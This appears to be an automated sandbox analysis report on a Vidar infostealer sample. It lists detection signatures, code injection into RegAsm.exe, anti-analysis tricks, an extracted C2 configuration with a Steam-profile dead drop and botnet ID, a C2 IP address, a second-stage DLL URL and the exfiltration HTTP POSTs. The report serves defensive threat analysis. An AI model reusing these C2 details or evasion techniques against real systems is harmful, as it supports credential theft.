Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1519653
MD5:	4453d7bc66e29c48ed6495bfa820e5b5
SHA1:	da622e588d635bbadd7ff04ad3df5db191ff0549
SHA256:	941e7002f11290e3ed9dd99d8cc0abc62f6cf69b923ae30b89741579854a8a70
Tags:	exeuser-Bitsight
Infos:

Detection

Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected Powershell download and execute

Yara detected Vidar stealer

.NET source code contains very large array initializations

.NET source code references suspicious native API functions

AI detected suspicious sample

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Contains functionality to inject code into remote processes

Injects a PE file into a foreign processes

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to detect sandboxes (mouse cursor move detection)

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE / OLE file has an invalid certificate

Queries information about the installed CPU (vendor, model number etc)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

file.exe (PID: 928 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 4453D7BC66E29C48ED6495BFA820E5B5)

conhost.exe (PID: 5448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegAsm.exe (PID: 4628 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

RegAsm.exe (PID: 5676 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

WerFault.exe (PID: 5684 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5676 -s 2188 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: Vidar

{"C2 url": ["https://steamcommunity.com/profiles/76561199780418869"], "Botnet": "b26735cbe8ca9e75712ffe3aa40c4a60"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000000.00000002.1775378329.00000000033D5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000000.00000002.1775378329.00000000033D5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: file.exe PID: 928	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: file.exe PID: 928	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: file.exe PID: 928	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: RegAsm.exe PID: 5676	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 5676	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: RegAsm.exe PID: 5676	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 5676	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 6 entries

Unpacked PEs

Source	Rule	Description	Author
0.2.file.exe.33d5570.1.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0.2.file.exe.33d5570.1.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
0.2.file.exe.33d5570.1.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0.2.file.exe.33d5570.1.raw.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
3.2.RegAsm.exe.400000.0.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
3.2.RegAsm.exe.400000.0.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
3.2.RegAsm.exe.400000.0.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
3.2.RegAsm.exe.400000.0.raw.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 3 entries

Suricata Signatures

ET JA3 Hash - [Abuse.ch] Possible Dridex

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T19:49:32.179378+0200	2028765	3	Unknown Traffic	192.168.2.4	49740	5.75.211.162	443	TCP
2024-09-26T19:49:33.384870+0200	2028765	3	Unknown Traffic	192.168.2.4	49741	5.75.211.162	443	TCP
2024-09-26T19:49:34.954154+0200	2028765	3	Unknown Traffic	192.168.2.4	49742	5.75.211.162	443	TCP
2024-09-26T19:49:36.833518+0200	2028765	3	Unknown Traffic	192.168.2.4	49743	5.75.211.162	443	TCP
2024-09-26T19:49:38.321713+0200	2028765	3	Unknown Traffic	192.168.2.4	49744	5.75.211.162	443	TCP
2024-09-26T19:49:52.524007+0200	2028765	3	Unknown Traffic	192.168.2.4	49752	5.75.211.162	443	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T19:49:37.670343+0200	2044247	1	Malware Command and Control Activity Detected	5.75.211.162	443	192.168.2.4	49743	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T19:49:39.047255+0200	2051831	1	Malware Command and Control Activity Detected	5.75.211.162	443	192.168.2.4	49744	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T19:49:39.047099+0200	2049087	1	A Network Trojan was detected	192.168.2.4	49744	5.75.211.162	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://5.75.211.162/sqlp.dllg	Avira URL Cloud: Label: malware
Source: https://5.75.211.162/sqlp.dllb	Avira URL Cloud: Label: malware
Source: https://steamcommunity.com/profiles/76561199780418869/badges	Avira URL Cloud: Label: malware
Source: https://steamcommunity.com/profiles/76561199780418869/inventory/	Avira URL Cloud: Label: malware
Source: https://steamcommunity.com/profiles/76561199780418869	Avira URL Cloud: Label: malware
Source: https://5.75.211.162/%	Avira URL Cloud: Label: malware
Source: https://5.75.211.162	Avira URL Cloud: Label: malware
Source: https://t.me/ae5ed	Avira URL Cloud: Label: malware
Source: https://5.75.211.162/sqlp.dll	Avira URL Cloud: Label: malware
Source: https://5.75.211.162/sqlp.dlls.exe	Avira URL Cloud: Label: malware
Source: https://5.75.211.162/E	Avira URL Cloud: Label: malware
Source: https://5.75.211.162/2	Avira URL Cloud: Label: malware
Source: https://5.75.211.162/V	Avira URL Cloud: Label: malware
Source: https://5.75.211.162/M	Avira URL Cloud: Label: malware
Source: https://5.75.211.162/c	Avira URL Cloud: Label: malware
Source: https://5.75.211.162/	Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000000.00000002.1775378329.00000000033D5000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199780418869"], "Botnet": "b26735cbe8ca9e75712ffe3aa40c4a60"}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.6% probability

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 5.75.211.162:443 -> 192.168.2.4:49740 version: TLS 1.2

Source: file.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:

Binary string: c:\rje\tg\jv2je3\obj\Release\ojc.pdb source: file.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00415142 GetLogicalDriveStringsA,_memset,GetDriveTypeA,

3_2_00415142

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr fs:[00000030h]		3_2_004014AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov dword ptr [ebp-04h], eax		3_2_004014AD

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST : 192.168.2.4:49744 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 5.75.211.162:443 -> 192.168.2.4:49744
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 5.75.211.162:443 -> 192.168.2.4:49743

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: https://steamcommunity.com/profiles/76561199780418869

Source: global traffic

HTTP traffic detected: GET /profiles/76561199780418869 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache

Source: Joe Sandbox View	IP Address: 104.102.49.254 104.102.49.254
Source: Joe Sandbox View	IP Address: 5.75.211.162 5.75.211.162

Source: Joe Sandbox View	ASN Name: AKAMAI-ASUS AKAMAI-ASUS
Source: Joe Sandbox View	ASN Name: HETZNER-ASDE HETZNER-ASDE

Source: Joe Sandbox View	JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49741 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49744 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49740 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49743 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49742 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49752 -> 5.75.211.162:443

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CBFCBKKFBAEHJKEBKFCBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 256Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AEBAFBGIDHCBFHIECFCBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GIIIIJDHJEGIECBGHIJEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DAFCAAEGDBKJJKECBKFHUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 332Connection: Keep-AliveCache-Control: no-cache

Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00406963 InternetOpenA,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,InternetCloseHandle,

3_2_00406963

Source: global traffic	HTTP traffic detected: GET /profiles/76561199780418869 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache

Source: global traffic

DNS traffic detected: DNS query: steamcommunity.com

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CBFCBKKFBAEHJKEBKFCBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 256Connection: Keep-AliveCache-Control: no-cache

Source: file.exe	String found in binary or memory: http://aia.entrust.net/ts1-chain256.cer01
Source: file.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: file.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: file.exe, 00000000.00000002.1775378329.00000000033D5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.org_DEBUG.zip/c
Source: file.exe	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: file.exe	String found in binary or memory: http://crl.entrust.net/ts1ca.crl0
Source: file.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: file.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: file.exe	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: file.exe	String found in binary or memory: http://ocsp.digicert.com0
Source: file.exe	String found in binary or memory: http://ocsp.digicert.com0A
Source: file.exe	String found in binary or memory: http://ocsp.entrust.net02
Source: file.exe	String found in binary or memory: http://ocsp.entrust.net03
Source: RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: Amcache.hve.9.dr	String found in binary or memory: http://upx.sf.net
Source: file.exe	String found in binary or memory: http://www.digicert.com/CPS0
Source: file.exe	String found in binary or memory: http://www.entrust.net/rpa03
Source: RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: 76561199780418869[1].htm.3.dr	String found in binary or memory: https://5.75.211.162
Source: RegAsm.exe, 00000003.00000002.2183942555.000000000058A000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162.exe
Source: RegAsm.exe, 00000003.00000002.2185117153.0000000000DEC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2185117153.0000000000E5F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2185117153.0000000000D8A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/
Source: RegAsm.exe, 00000003.00000002.2185117153.0000000000E5F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/%
Source: RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/2
Source: RegAsm.exe, 00000003.00000002.2185117153.0000000000DEC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/E
Source: RegAsm.exe, 00000003.00000002.2185117153.0000000000E5F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/M
Source: RegAsm.exe, 00000003.00000002.2185117153.0000000000E5F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/V
Source: RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/c
Source: RegAsm.exe, 00000003.00000002.2183942555.000000000055D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2185117153.0000000000D8A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/sqlp.dll
Source: RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/sqlp.dllb
Source: RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/sqlp.dllg
Source: RegAsm.exe, 00000003.00000002.2183942555.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/sqlp.dlls.exe
Source: RegAsm.exe, 00000003.00000002.2183942555.0000000000582000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162BKFCB
Source: 76561199780418869[1].htm.3.dr	String found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=nSnUuYf7g6U1&a
Source: RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english
Source: RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
Source: RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
Source: RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1
Source: RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis
Source: RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
Source: RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=PzKBszTg
Source: RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=WnGP
Source: RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.0000000000483000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english
Source: RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.0000000000483000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
Source: RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&l=engl
Source: RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
